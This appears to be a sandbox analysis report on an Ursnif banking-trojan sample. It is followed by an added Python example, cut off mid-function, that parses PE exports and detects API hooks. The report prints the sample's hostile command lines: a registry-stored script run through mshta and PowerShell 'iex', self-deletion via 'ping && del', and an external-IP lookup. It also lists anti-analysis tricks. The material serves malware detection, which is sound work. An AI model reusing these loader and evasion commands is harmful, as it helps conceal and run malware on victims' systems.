Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 44_2_0374FBD1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373A63D memset,NtQueryInformationProcess, 44_2_0373A63D
Sample file is different than original file name gathered from version info
Source: FpYf5EGDO9.exe, 00000000.00000003.457741081.0000000005EC4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FpYf5EGDO9.exe
Source: FpYf5EGDO9.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211123
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@33/20@11/7
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: FpYf5EGDO9.exe Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\FpYf5EGDO9.exe "C:\Users\user\Desktop\FpYf5EGDO9.exe"
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_03C48F1B
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CC8B2523-BB54-DEC2-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{149D3F5E-63E5-660B-8D88-47FA113C6BCE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{ECAECFE4-5BDD-FE72-45E0-BF1249146366}
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CCD0A5F-ABCA-0E60-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: pemahu 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: Regefiri 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: Xegixaze 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: \H 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: zijiwe 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: "Y? 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Command line argument: mecevituxe 0_2_0042F2F0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: FpYf5EGDO9.exe Static PE information: More than 200 imports for KERNEL32.dll
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FpYf5EGDO9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4E9AC push 0B565A71h; ret 0_2_03C4E9B1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AFAF push ecx; ret 0_2_03C4AFBF
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AC00 push ecx; ret 0_2_03C4AC09
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4E62F push edi; retf 0_2_03C4E630
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_0042EA80 push ecx; mov dword ptr [esp], 00000000h 0_2_0042EA81
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C5A54 push ds; ret 0_2_021C5A55
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BF050 push ebx; retf 0_2_021BF062
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BED5D push edx; iretd 0_2_021BED94
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C3D79 push 12BFE4EFh; ret 0_2_021C3D7E
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BFF72 push esp; iretd 0_2_021BFF83
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BE769 push esi; iretd 0_2_021BE76A
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021C2BBF push es; iretd 0_2_021C2BC2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374FECD push ecx; mov dword ptr [esp], 00000002h 44_2_0374FECE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_03752D7B push ecx; ret 44_2_03752D8B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: initial sample Static PE information: section name: .text entropy: 7.04723316599

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i1aaekli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFC8BAF521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFC8BAF5200
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process information set: NOOPENFILEERRORBOX (x2)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (x78)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (x26)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (x4)

Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 (x2)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296 Thread sleep time: -6456360425798339s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (x4)
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (x2)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5548
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4162
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i1aaekli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWPw#
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000027.00000000.663110926.000002DE46A40000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.491335244.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: FpYf5EGDO9.exe, 00000000.00000002.510522869.000000000222F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000019.00000000.495767986.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_0374A2FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_0373E9AC

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401264 LoadLibraryA,GetProcAddress, 0_2_00401264
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_021BC1C2 push dword ptr fs:[00000030h] 0_2_021BC1C2
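The user mode hook signatures earlier in this report (EAT change in WININET.dll, IAT and inline patch on KERNEL32!CreateProcessAsUserW, hooked RegGetValueW, all inside explorer.exe) and the two anti-debugging signatures just above (LoadLibraryA/GetProcAddress resolution, fs:[30h] PEB read) revolve around the same structure: the PE export directory that GetProcAddress, and any hand-rolled resolver walking the PEB module list, reads to turn a name into an address. The following is an added example, not code from the report or from the sample. It parses the export directory of a mapped image the way GetProcAddress does, then diffs an in-memory copy against a clean on-disk copy to report EAT hooks (changed AddressOfFunctions entries) and inline hooks (patched prologues, with the jump target decoded). The PE image, the "clean" prologues, the injected-region addresses (VA 0xD70000, RVA 0x5000) and the hook bytes are constructed fixtures.

```python
"""Resolve exports from a mapped PE image and diff memory vs disk for EAT and
inline hooks.  Added example; the PE image below is a constructed fixture."""
import struct


def _u16(b, off): return struct.unpack_from("<H", b, off)[0]
def _u32(b, off): return struct.unpack_from("<I", b, off)[0]


def export_dir_rva(image):
    """RVA of IMAGE_DIRECTORY_ENTRY_EXPORT, for PE32 and PE32+ headers."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    nt = _u32(image, 0x3C)
    if image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    opt = nt + 4 + 20                                          # IMAGE_OPTIONAL_HEADER
    dd = opt + (0x70 if _u16(image, opt) == 0x20B else 0x60)   # DataDirectory[0]
    return _u32(image, dd)


def parse_exports(image):
    """{name: rva} from the export directory.  The image is mapped, so RVAs index
    it directly, exactly as a resolver reading process memory would use them."""
    exp = export_dir_rva(image)
    if exp == 0:
        return {}
    n_names = _u32(image, exp + 0x18)
    funcs, names, ords = (_u32(image, exp + o) for o in (0x1C, 0x20, 0x24))
    out = {}
    for i in range(n_names):
        name_rva = _u32(image, names + 4 * i)
        name = image[name_rva:image.index(b"\0", name_rva)].decode("ascii")
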